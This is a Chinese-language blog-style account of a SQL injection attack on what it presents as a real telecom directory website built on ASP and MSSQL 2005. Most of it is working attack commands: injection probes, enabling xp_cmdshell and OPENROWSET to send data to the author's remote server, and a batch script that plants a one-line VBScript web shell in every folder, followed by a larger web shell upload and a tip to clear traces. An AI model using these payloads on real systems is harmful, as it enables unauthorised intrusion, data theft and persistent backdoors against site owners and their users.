MSSQL2005注入攻击

电信级的系统估计都是采用比较大型的数据库了吧~ 而且涉及到高速搜索方面的！出乎我意料之外呢！兰州电信 号码百事通的网站 居然是用IIS ASP！呵呵！ASP估计脚本小子都玩得很熟悉了！-_- 而且ASP不采用FSO生成静态页面技术！ 呵呵~其实注入点并不是那么好找的!毕竟是电信的大网站！测试了好多个点都失败,我个人比较喜欢找那些片偏僻的url连接！那些80%的程序员都会疏忽~！ OK 来个经典 and 0=0 and 0=1 返回不一样的结果！看来是数字输入的了！ 不说太多~ 再看看是什么数据库 跟ASP结合 80% 都是MSSQL了！不过也有例外的~呵呵例如第2代身份证验证的网站 我记得有好几个是采用ASP/ASPX ORACLE 的！题外话就不多说了！来点直接的！
and exists(select @@version)-- 返回正常哦~ 呵呵看来不会是ORACLE其他了 要么就是SYBASE 要么就是 MSSQL
那再来看看 SYBASE 没有IS_SRVROLEMEMBER函数的！只有MS的才会有！而SYBASE判断权限就只有用show_role
and 1=(select IS_SRVROLEMEMBER('sysadmin'))-- 喔？ 返回正常哦 , 真大意啊~是SA权限！
OK那么 就来个我的最爱 OPENROWSET
先建一个表
create table c(dir ntext,num int,f int)--
然后
insert c execute master..xp_dirtree 'c:\',1,1--
insert into OPENROWSET('SQLOLEDB','xxx.xxx.xxx.1';'sa';'p','select * from Northwind.dbo.dirtree')
select * from c--把远程的表导到我自己机器上的MSSQL
发现报告错误
不允许OPENROWSET ~~ 奇怪？？ 难道是MSSQL2005？权限问题？靠！那就开呗！幸好是SA权限
EXEC sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--开始分布式事务
现在来真的了！不过还是有我最担心的~ 就是WEB跟DATABASE是分离的！这样搞起来就郁闷了！OK！
既然是SA 那就把他的CMDSHELL都开了吧~
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
这样就可以开启CMDSHELL 但是还没有添加扩展存储过程
dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
其实没有什么必要的~只是我为了方便防火墙！
再来执行 exec master..xp_cmdshell 'ping 自己IP' 防火墙检测到有对方IP ping自己了呵呵！然后再ping他的WEBSITE
看来是同一个IP哦~ 哈哈！那就爽了！那我就直接在他本地写一个bat吧！
随便找个地方用xp_cmdshell写了个bat 内容为
FOR /R "C:\" %%v IN (1.asp) DO echo ^<script language=vbscript runat=server^>execute request(^"z^")^</script^> >%%v
然后用他的xp_cmdshell执行 OK
在C盘下面所有文件夹都有这个1.asp了~ 呵呵 如此类推
把其他盘也感染.... 5分钟过后！~ 他的所有盘 所有文件夹都有这个 1.asp的一句话~ 哈哈！来到www.lanzhouXXXXX.com 在他的web上面传个大马子~KO~~... 记得收拾残局！把之前的垃圾清除~呵呵